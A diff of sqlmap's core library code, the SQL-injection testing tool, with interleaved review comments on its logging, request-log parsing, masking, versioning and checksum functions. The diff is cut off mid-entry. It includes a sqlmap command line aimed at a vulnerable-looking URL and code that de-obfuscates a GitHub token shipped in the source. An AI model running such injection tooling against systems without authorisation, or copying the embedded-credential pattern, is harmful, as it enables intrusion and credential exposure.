@@ -1843,7 +1921,7 @@ def parseUnionPage(page): if re.search(r"(?si)\A%s.*%s\Z" % (kb.chars.start, kb.chars.stop), page): if len(page) > LARGE_OUTPUT_THRESHOLD: warnMsg = "large output detected. This might take a while" - logger.warn(warnMsg) + logger.warning(warnMsg) data = BigArray() keys = set() @@ -2248,7 +2326,7 @@ def ntToPosixSlashes(filepath): Replaces all occurrences of NT backslashes in provided filepath with Posix slashes - >>> ntToPosixSlashes('C:\\Windows') + >>> ntToPosixSlashes(r'C:\\Windows') 'C:/Windows' """ @@ -2460,21 +2538,22 @@ def initCommonOutputs(): kb.commonOutputs = {} key = None - for line in openFile(paths.COMMON_OUTPUTS, 'r'): - if line.find('#') != -1: - line = line[:line.find('#')] + with openFile(paths.COMMON_OUTPUTS, 'r') as f: + for line in f: + if line.find('#') != -1: + line = line[:line.find('#')] - line = line.strip() + line = line.strip() - if len(line) > 1: - if line.startswith('[') and line.endswith(']'): - key = line[1:-1] - elif key: - if key not in kb.commonOutputs: - kb.commonOutputs[key] = set() + if len(line) > 1: + if line.startswith('[') and line.endswith(']'): + key = line[1:-1] + elif key: + if key not in kb.commonOutputs: + kb.commonOutputs[key] = set() - if line not in kb.commonOutputs[key]: - kb.commonOutputs[key].add(line) + if line not in kb.commonOutputs[key]: + kb.commonOutputs[key].add(line) def getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False): """ @@ -2732,7 +2811,7 @@ def wasLastResponseDelayed(): if len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: warnMsg = "time-based standard deviation method used on a model " warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES - logger.warn(warnMsg) + logger.warning(warnMsg) lowerStdLimit = average(kb.responseTimes[kb.responseTimeMode]) + TIME_STDEV_COEFF * deviation retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit)) 
@@ -2895,7 +2974,7 @@ def _(match): if spaceplus: result = result.replace('+', ' ') # plus sign has a special meaning in URL encoded data (hence the usage of _urllib.parse.unquote_plus in convall case) - result = re.sub(r"%([0-9a-fA-F]{2})", _, result) + result = re.sub(r"%([0-9a-fA-F]{2})", _, result or "") result = getUnicode(result, encoding or UNICODE_ENCODING) @@ -3055,6 +3134,8 @@ def extractRegexResult(regex, content, flags=0): >>> extractRegexResult(r'a(?P[^g]+)g', 'abcdefg') 'bcdef' + >>> extractRegexResult(r'a(?P[^g]+)g', 'ABCDEFG', re.I) + 'BCDEF' """ retVal = None @@ -3120,7 +3201,14 @@ def isNumPosStrValue(value): False """ - return ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT + retVal = False + + try: + retVal = ((hasattr(value, "isdigit") and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)) and int(value) < MAX_INT + except ValueError: + pass + + return retVal @cachedmethod def aliasToDbmsEnum(dbms): 
@@ -3340,19 +3428,39 @@ def parseSqliteTableSchema(value): >>> kb.data.cachedColumns = {} >>> parseSqliteTableSchema("CREATE TABLE users(\\n\\t\\tid INTEGER,\\n\\t\\tname TEXT\\n);") True - >>> repr(kb.data.cachedColumns).count(',') == 1 + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE dummy(`foo bar` BIGINT, \\"foo\\" VARCHAR, 'bar' TEXT)"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('foo bar', 'BIGINT'), ('foo', 'VARCHAR'), ('bar', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE suppliers(\\n\\tsupplier_id INTEGER PRIMARY KEY DESC,\\n\\tname TEXT NOT NULL\\n);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('supplier_id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE country_languages (\\n\\tcountry_id INTEGER NOT NULL,\\n\\tlanguage_id INTEGER NOT NULL,\\n\\tPRIMARY KEY (country_id, language_id),\\n\\tFOREIGN KEY (country_id) REFERENCES countries (country_id) ON DELETE CASCADE ON UPDATE NO ACTION,\\tFOREIGN KEY (language_id) REFERENCES languages (language_id) ON DELETE CASCADE ON UPDATE NO ACTION);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('country_id', 'INTEGER'), ('language_id', 'INTEGER')) True """ retVal = False + value = extractRegexResult(r"(?s)\((?P.+)\)", value) + if value: table = {} - columns = {} + columns = OrderedDict() + + value = re.sub(r"\(.+?\)", "", value).strip() - for match in re.finditer(r"[(,]\s*[\"'`]?(\w+)[\"'`]?(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I): + for match in 
re.finditer(r"(?:\A|,)\s*(([\"'`]).+?\2|\w+)(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I): + column = match.group(1).strip(match.group(2) or "") + if re.search(r"(?i)\A(CONSTRAINT|PRIMARY|UNIQUE|CHECK|FOREIGN)\b", column.strip()): + continue retVal = True - columns[match.group(1)] = match.group(2) or "TEXT" + + columns[column] = match.group(3) or "TEXT" table[safeSQLIdentificatorNaming(conf.tbl, True)] = columns kb.data.cachedColumns[conf.db] = table @@ -3534,7 +3642,7 @@ def initTechnique(technique=None): else: warnMsg = "there is no injection data available for technique " warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique) - logger.warn(warnMsg) + logger.warning(warnMsg) except SqlmapDataException: errMsg = "missing data in old session file(s). " @@ -3563,6 +3671,8 @@ def unArrayizeValue(value): >>> unArrayizeValue(['1']) '1' + >>> unArrayizeValue('1') + '1' >>> unArrayizeValue(['1', '2']) '1' >>> unArrayizeValue([['a', 'b'], 'c']) @@ -3607,10 +3717,12 @@ def joinValue(value, delimiter=','): '1,2' >>> joinValue('1') '1' + >>> joinValue(['1', None]) + '1,None' """ if isListLike(value): - retVal = delimiter.join(value) + retVal = delimiter.join(getText(_ if _ is not None else "None") for _ in value) else: retVal = value @@ -3647,7 +3759,7 @@ def priorityFunction(test): if test.stype == PAYLOAD.TECHNIQUE.UNION: retVal = SORT_ORDER.LAST - elif "details" in test and "dbms" in test.details: + elif "details" in test and "dbms" in (test.details or {}): if intersect(test.details.dbms, Backend.getIdentifiedDbms()): retVal = SORT_ORDER.SECOND else: 
@@ -3683,7 +3795,7 @@ def showHttpErrorCodes(): if kb.httpErrorCodes: warnMsg = "HTTP error codes detected during run:\n" warnMsg += ", ".join("%d (%s) - %d times" % (code, _http_client.responses[code] if code in _http_client.responses else '?', count) for code, count in kb.httpErrorCodes.items()) - logger.warn(warnMsg) + logger.warning(warnMsg) if any((str(_).startswith('4') or str(_).startswith('5')) and _ != _http_client.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes): msg = "too many 4xx and/or 5xx HTTP error codes " msg += "could mean that some kind of protection is involved (e.g. WAF)" @@ -3756,29 +3868,6 @@ def decodeIntToUnicode(value): return retVal -def checkIntegrity(): - """ - Checks integrity of code files during the unhandled exceptions - """ - - if not paths: - return - - logger.debug("running code integrity check") - - retVal = True - - baseTime = os.path.getmtime(paths.SQLMAP_SETTINGS_PATH) + 3600 # First hour free parking :) - for root, _, filenames in os.walk(paths.SQLMAP_ROOT_PATH): - for filename in filenames: - if re.search(r"(\.py|\.xml|_)\Z", filename): - filepath = os.path.join(root, filename) - if os.path.getmtime(filepath) > baseTime: - logger.error("wrong modification time of '%s'" % filepath) - retVal = False - - return retVal - def getDaysFromLastUpdate(): """ Get total number of days from last update 
@@ -3911,13 +4000,14 @@ def createGithubIssue(errMsg, excMsg): if closed: warnMsg += " and resolved. Please update to the latest " warnMsg += "development version from official GitHub repository at '%s'" % GIT_PAGE - logger.warn(warnMsg) + logger.warning(warnMsg) return except: pass data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)} - req = _urllib.request.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=getBytes(json.dumps(data)), headers={HTTP_HEADER.AUTHORIZATION: "token %s" % decodeBase64(GITHUB_REPORT_OAUTH_TOKEN, binary=False), HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + token = getText(zlib.decompress(decodeBase64(GITHUB_REPORT_OAUTH_TOKEN[::-1], binary=True))[0::2][::-1]) + req = _urllib.request.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=getBytes(json.dumps(data)), headers={HTTP_HEADER.AUTHORIZATION: "token %s" % token, HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) try: content = getText(_urllib.request.urlopen(req).read()) @@ -3941,7 +4031,7 @@ def createGithubIssue(errMsg, excMsg): warnMsg += " ('%s')" % _excMsg if "Unauthorized" in warnMsg: warnMsg += ". Please update to the latest revision" - logger.warn(warnMsg) + logger.warning(warnMsg) def maskSensitiveData(msg): """ @@ -3949,7 +4039,7 @@ def maskSensitiveData(msg): >>> maskSensitiveData('python sqlmap.py -u "http://www.test.com/vuln.php?id=1" --banner') == 'python sqlmap.py -u *********************************** --banner' True - >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index') == 'sqlmap.py -u **************************' + >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index --auth-type=basic --auth-creds=foo:bar\\ndummy line') == 'sqlmap.py -u ************************** --auth-type=***** --auth-creds=*******\\ndummy line' True """ 
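Review bot: The new `token = ...` line in createGithubIssue still recovers a credential that ships inside the source tree, so the reverse/base64/zlib/slice steps are obfuscation rather than protection: anyone holding the file can derive the same value. A comment above the line should say so, for example `# NOTE: obfuscation only, not a secret - anyone with the source can recover this token; keep its scope limited to issue creation`. The function body starts and ends outside the hunk, so whether errMsg and excMsg are masked before being posted cannot be confirmed from here.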
@@ -3965,7 +4055,7 @@ def maskSensitiveData(msg): retVal = retVal.replace(value, '*' * len(value)) # Just in case (for problematic parameters regarding user encoding) - for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal): + for match in re.finditer(r"(?im)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|$)", retVal): retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) # Fail-safe substitutions @@ -4132,10 +4222,11 @@ def _thread(regex): if not suppressWarning: debugMsg = "turning off reflection removal mechanism (for optimization purposes)" logger.debug(debugMsg) - except MemoryError: + + except (MemoryError, SystemError): kb.reflectiveMechanism = False if not suppressWarning: - debugMsg = "turning off reflection removal mechanism (because of low memory issues)" + debugMsg = "turning off reflection removal mechanism" logger.debug(debugMsg) return retVal @@ -4177,6 +4268,9 @@ def safeSQLIdentificatorNaming(name, isTable=False): retVal = name + if conf.unsafeNaming: + return retVal + if isinstance(name, six.string_types): retVal = getUnicode(name) _ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) @@ -4207,7 +4301,8 @@ def safeSQLIdentificatorNaming(name, isTable=False): retVal = "[%s]" % retVal if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal): - retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) + if (conf.db or "").lower() != "information_schema": # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5192 + retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal) return retVal @@ -4333,7 +4428,7 @@ def __init__(self): if not options: warnMsg = "mnemonic '%s' can't be resolved" % name - logger.warn(warnMsg) + logger.warning(warnMsg) elif name in options: found = name debugMsg = "mnemonic '%s' resolved to %s). " % (name, found) 
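Review bot: With `(?m)` and `$`, the masking regex in maskSensitiveData stops each value at the end of its line, and because `.` does not match a newline, whatever a sensitive option carries after an embedded line break is left unmasked. If `--headers` or `--data` values can reach this function with real newlines (not visible here), the tail of such a value would survive into the reported text; a doctest with a two-line option value would pin the intended behaviour. Separately, `retVal.replace(match.group(3), ...)` replaces every occurrence of the captured value in the message, so a very short value also masks unrelated text; a comment noting that over-masking is accepted would help the next reader. The function body starts outside the hunk.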
@@ -4342,7 +4437,7 @@ def __init__(self): found = sorted(options.keys(), key=len)[0] warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options)) warnMsg += "Resolved to shortest of those ('%s')" % found - logger.warn(warnMsg) + logger.warning(warnMsg) if found: found = options[found] @@ -4557,7 +4652,7 @@ def isAdminFromPrivileges(privileges): return retVal -def findPageForms(content, url, raise_=False, addToTargets=False): +def findPageForms(content, url, raiseException=False, addToTargets=False): """ Parses given page content for possible forms (Note: still not implemented for Python3) @@ -4575,7 +4670,7 @@ def geturl(http://github.com/self): if not content: errMsg = "can't parse forms as the page content appears to be blank" - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) @@ -4597,7 +4692,7 @@ def geturl(http://github.com/self): forms = ParseResponse(filtered, backwards_compat=False) except: errMsg = "no success" - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) @@ -4624,14 +4719,14 @@ def geturl(http://github.com/self): except (ValueError, TypeError) as ex: errMsg = "there has been a problem while " errMsg += "processing page forms ('%s')" % getSafeExString(ex) - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) else: url = urldecode(request.get_full_url(), kb.pageEncoding) method = request.get_method() - data = request.data + data = unArrayizeValue(request.data) data = urldecode(data, kb.pageEncoding, spaceplus=False) if not data and method and method.upper() == HTTPMETHOD.POST: 
@@ -4676,7 +4771,7 @@ def geturl(http://github.com/self): if not retVal and not conf.crawlDepth: errMsg = "there were no forms found at the given target URL" - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) @@ -4748,7 +4843,7 @@ def checkOldOptions(args): warnMsg = "switch/option '%s' is deprecated" % _ if DEPRECATED_OPTIONS[_]: warnMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_] - logger.warn(warnMsg) + logger.warning(warnMsg) def checkSystemEncoding(): """ @@ -4766,7 +4861,7 @@ def checkSystemEncoding(): logger.critical(errMsg) warnMsg = "temporary switching to charset 'cp1256'" - logger.warn(warnMsg) + logger.warning(warnMsg) _reload_module(sys) sys.setdefaultencoding("cp1256") @@ -4854,6 +4949,12 @@ def decodeDbmsHexValue(value, raw=False): >>> decodeDbmsHexValue('3132332031') == u'123 1' True + >>> decodeDbmsHexValue('31003200330020003100') == u'123 1' + True + >>> decodeDbmsHexValue('00310032003300200031') == u'123 1' + True + >>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1' + True >>> decodeDbmsHexValue('313233203') == u'123 ?' True >>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2'] @@ -4892,6 +4993,9 @@ def _(value): if not isinstance(retVal, six.text_type): retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING) + if u"\x00" in retVal: + retVal = retVal.replace(u"\x00", u"") + return retVal try: @@ -4980,6 +5084,7 @@ def resetCookieJar(cookieJar): logger.info(infoMsg) content = readCachedFileContent(conf.loadCookies) + content = re.sub("(?im)^#httpOnly_", "", content) lines = filterNone(line.strip() for line in content.split("\n") if not line.startswith('#')) handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR) os.close(handle) @@ -5175,6 +5280,9 @@ def _parseWebScarabLog(content): Parses WebScarab logs (POST method not supported) """ + if WEBSCARAB_SPLITTER not in content: + return + reqResList = content.split(WEBSCARAB_SPLITTER) for request in reqResList: 
@@ -5193,7 +5301,7 @@ def _parseWebScarabLog(content): logger.warning(warnMsg) continue - if not(conf.scope and not re.search(conf.scope, url, re.I)): + if not (conf.scope and not re.search(conf.scope, url, re.I)): yield (url, method, None, cookie, tuple()) def _parseBurpLog(content): @@ -5241,6 +5349,7 @@ def _parseBurpLog(content): continue getPostReq = False + forceBody = False url = None host = None method = None @@ -5257,11 +5366,13 @@ def _parseBurpLog(content): if not line.strip() and index == len(lines) - 1: break + line = re.sub(INJECT_HERE_REGEX, CUSTOM_INJECTION_MARK_CHAR, line) + newline = "\r\n" if line.endswith('\r') else '\n' line = line.strip('\r') match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None - if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None: + if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None: data = "" params = True @@ -5298,16 +5409,18 @@ def _parseBurpLog(content): elif key.upper() == HTTP_HEADER.HOST.upper(): if '://' in value: scheme, value = value.split('://')[:2] - splitValue = value.split(":") - host = splitValue[0] - if len(splitValue) > 1: - port = filterStringValue(splitValue[1], "[0-9]") + port = extractRegexResult(r":(?P\d+)\Z", value) + if port: + host = value[:-(1 + len(port))] + else: + host = value # Avoid to add a static content length header to # headers and consider the following lines as # POSTed data if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): + forceBody = True params = True # Avoid proxy and connection type related headers @@ -5338,7 +5451,7 @@ def _parseBurpLog(content): scheme = None port = None - if not(conf.scope and not re.search(conf.scope, url, re.I)): + if not (conf.scope and not re.search(conf.scope, url, re.I)): yield (url, conf.method or method, data, cookie, tuple(headers)) content = readCachedFileContent(reqFile) 
@@ -5346,6 +5459,12 @@ def _parseBurpLog(content): if conf.scope: logger.info("using regular expression '%s' for filtering targets" % conf.scope) + try: + re.compile(conf.scope) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.scope, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + for target in _parseBurpLog(content): yield target @@ -5472,3 +5591,28 @@ def chunkSplitPostData(data): retVal += "0\r\n\r\n" return retVal + +def checkSums(): + """ + Validate the content of the digest file (i.e. sha256sums.txt) + >>> checkSums() + True + """ + + retVal = True + + if paths.get("DIGEST_FILE"): + for entry in getFileItems(paths.DIGEST_FILE): + match = re.search(r"([0-9a-f]+)\s+([^\s]+)", entry) + if match: + expected, filename = match.groups() + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, filename).replace('/', os.path.sep) + if not checkFile(filepath, False): + continue + with open(filepath, "rb") as f: + content = f.read() + if not hashlib.sha256(content).hexdigest() == expected: + retVal &= False + break + + return retVal diff --git a/lib/core/compat.py b/lib/core/compat.py index 50d18695d16..7020f85c01e 100644 --- a/lib/core/compat.py +++ b/lib/core/compat.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -12,6 +12,7 @@ import math import os import random +import re import sys import time import uuid 
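Review bot: checkSums() skips any listed file that is absent (`if not checkFile(filepath, False): continue`) and reads the digest list from the same tree it verifies, so it returns True when a listed file has been deleted and cannot detect a change made together with a matching edit to the digest file. Skipping may be deliberate for partial installs, but the docstring should state that this is a check for accidental modification or corruption, not a tamper-proof one. The pattern `([0-9a-f]+)\s+([^\s]+)` is unanchored and accepts a digest of any length; if entries are plain sha256sum output, `r"\A([0-9a-f]{64})\s+(\S+)"` is stricter. The comparison also reads more plainly as `if hashlib.sha256(content).hexdigest() != expected:` followed by `retVal = False`.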
@@ -167,8 +168,27 @@ def whseed(self, a=None): def patchHeaders(headers): if headers is not None and not hasattr(headers, "headers"): + if isinstance(headers, dict): + class _(dict): + def __getitem__(self, key): + for key_ in self: + if key_.lower() == key.lower(): + return super(_, self).__getitem__(key_) + + raise KeyError(key) + + def get(self, key, default=None): + try: + return self[key] + except KeyError: + return default + + headers = _(headers) + headers.headers = ["%s: %s\r\n" % (header, headers[header]) for header in headers] + return headers + def cmp(a, b): """ >>> cmp("a", "b") @@ -258,7 +278,37 @@ def __hash__(self): xrange = xrange buffer = buffer -try: - from pkg_resources import parse_version as LooseVersion -except ImportError: - from distutils.version import LooseVersion +def LooseVersion(version): + """ + >>> LooseVersion("1.0") == LooseVersion("1.0") + True + >>> LooseVersion("1.0.1") > LooseVersion("1.0") + True + >>> LooseVersion("1.0.1-") == LooseVersion("1.0.1") + True + >>> LooseVersion("1.0.11") < LooseVersion("1.0.111") + True + >>> LooseVersion("foobar") > LooseVersion("1.0") + False + >>> LooseVersion("1.0") > LooseVersion("foobar") + False + >>> LooseVersion("3.22-mysql") == LooseVersion("3.22-mysql-ubuntu0.3") + True + >>> LooseVersion("8.0.22-0ubuntu0.20.04.2") + 8.000022 + """ + + match = re.search(r"\A(\d[\d.]*)", version or "") + + if match: + result = 0 + value = match.group(1) + weight = 1.0 + for part in value.strip('.').split('.'): + if part.isdigit(): + result += int(part) * weight + weight *= 1e-3 + else: + result = float("NaN") + + return result diff --git a/lib/core/convert.py b/lib/core/convert.py index 4495f56a804..08594cdcfb6 100644 --- a/lib/core/convert.py +++ b/lib/core/convert.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ 
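Review bot: The dict subclass added in patchHeaders makes `headers[key]` and `headers.get(key)` case-insensitive but leaves `in`, `pop` and `setdefault` case-sensitive, so `"content-type" in headers` and `headers.get("content-type")` can disagree on the same object. Adding `def __contains__(self, key): return any(_.lower() == key.lower() for _ in self)` keeps the lookups consistent. `__getitem__` also calls `.lower()` on every stored key and on the requested one, which raises AttributeError for a non-string key; a one-line class docstring stating that keys are header-name strings would document that assumption.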
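Review bot: The replacement LooseVersion() weights each dotted component by a further factor of 1e-3, so a component of 1000 or more carries into the one before it: `"1.1000"` and `"2.0"` both evaluate to 2.0 and compare equal. Deep version strings also lose their low-order components to float precision. The docstring has doctests but no description; it should say that the function now returns a float (NaN when the string does not start with a digit) rather than a comparable version object, and that each component is assumed to be below 1000.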
@@ -16,6 +16,7 @@ import json import re import sys +import time from lib.core.bigarray import BigArray from lib.core.compat import xrange @@ -134,6 +135,23 @@ def dejsonize(data): return json.loads(data) +def rot13(data): + """ + Returns ROT13 encoded/decoded text + + >>> rot13('foobar was here!!') + 'sbbone jnf urer!!' + >>> rot13('sbbone jnf urer!!') + 'foobar was here!!' + """ + + # Reference: https://stackoverflow.com/a/62662878 + retVal = "" + alphabit = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ" + for char in data: + retVal += alphabit[alphabit.index(char) + 13] if char in alphabit else char + return retVal + def decodeHex(value, binary=True): """ Returns a decoded representation of provided hexadecimal value @@ -334,6 +352,10 @@ def getUnicode(value, encoding=None, noneToNull=False): True """ + # Best position for --time-limit mechanism + if conf.get("timeLimit") and kb.get("startTime") and (time.time() - kb.startTime > conf.timeLimit): + raise SystemExit + if noneToNull and value is None: return NULL diff --git a/lib/core/data.py b/lib/core/data.py index f086df4dec0..5b46facd058 100644 --- a/lib/core/data.py +++ b/lib/core/data.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/datatype.py b/lib/core/datatype.py index fab1fd1335e..159380e76c9 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -1,11 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ import copy +import threading import types from thirdparty.odict import OrderedDict 
@@ -49,6 +50,19 @@ def __getattr__(self, item): else: return None + def __delattr__(self, item): + """ + Deletes attributes + """ + + try: + return self.pop(item) + except KeyError: + if self.keycheck: + raise AttributeError("unable to access item '%s'" % item) + else: + return None + def __setattr__(self, item, value): """ Maps attributes to values @@ -129,6 +143,7 @@ class LRUDict(object): def __init__(self, capacity): self.capacity = capacity self.cache = OrderedDict() + self.__lock = threading.Lock() def __len__(self): return len(self.cache) @@ -145,11 +160,12 @@ def get(self, key): return self.__getitem__(key) def __setitem__(self, key, value): - try: - self.cache.pop(key) - except KeyError: - if len(self.cache) >= self.capacity: - self.cache.popitem(last=False) + with self.__lock: + try: + self.cache.pop(key) + except KeyError: + if len(self.cache) >= self.capacity: + self.cache.popitem(last=False) self.cache[key] = value def set(self, key, value): diff --git a/lib/core/decorators.py b/lib/core/decorators.py index 7ec5dbb6d43..cf68b1f4776 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/defaults.py b/lib/core/defaults.py index c1f4cd75bff..95762916124 100644 --- a/lib/core/defaults.py +++ b/lib/core/defaults.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -16,7 +16,7 @@ "timeout": 30, "retries": 3, "csrfRetries": 0, - "saFreq": 0, + "safeFreq": 0, "threads": 1, "level": 1, "risk": 1, diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 01a46ae0f9b..c4043381cf8 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py 
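Review bot: In LRUDict.__setitem__ the new `with self.__lock:` appears to cover only the pop/evict step: `self.cache[key] = value` is an unchanged context line, so it keeps the method's original indent and runs after the lock is released. Two threads can then both pass the `len(self.cache) >= self.capacity` check before either inserts, leaving the cache over capacity, and the insert itself is unsynchronised against a concurrent `popitem`. Moving the assignment inside the `with` block closes that window. `__getitem__` is not part of this hunk; if it also pops and re-inserts to refresh recency, it needs the same lock.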
@@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -38,6 +38,7 @@ from lib.core.settings import SYBASE_ALIASES from lib.core.settings import VERTICA_ALIASES from lib.core.settings import VIRTUOSO_ALIASES +from lib.core.settings import CLICKHOUSE_ALIASES FIREBIRD_TYPES = { 261: "BLOB", @@ -231,7 +232,7 @@ DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), - DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/%20&%20http://jpype.sourceforge.net/", None), + DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/%20&%20https://github.com/jpype-project/jpype", None), DBMS.H2: (H2_ALIASES, None, None, None), DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), DBMS.MONETDB: (MONETDB_ALIASES, "pymonetdb", "https://github.com/gijzelaerr/pymonetdb", "monetdb"), 
@@ -241,9 +242,10 @@ DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None), DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None), DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None), - DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"), + DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None), + DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"), DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None), - DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/%20&%20http://jpype.sourceforge.net/", None), + DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/%20&%20https://github.com/jpype-project/jpype", None), DBMS.EXTREMEDB: (EXTREMEDB_ALIASES, None, None, None), DBMS.FRONTBASE: (FRONTBASE_ALIASES, None, None, None), DBMS.RAIMA: 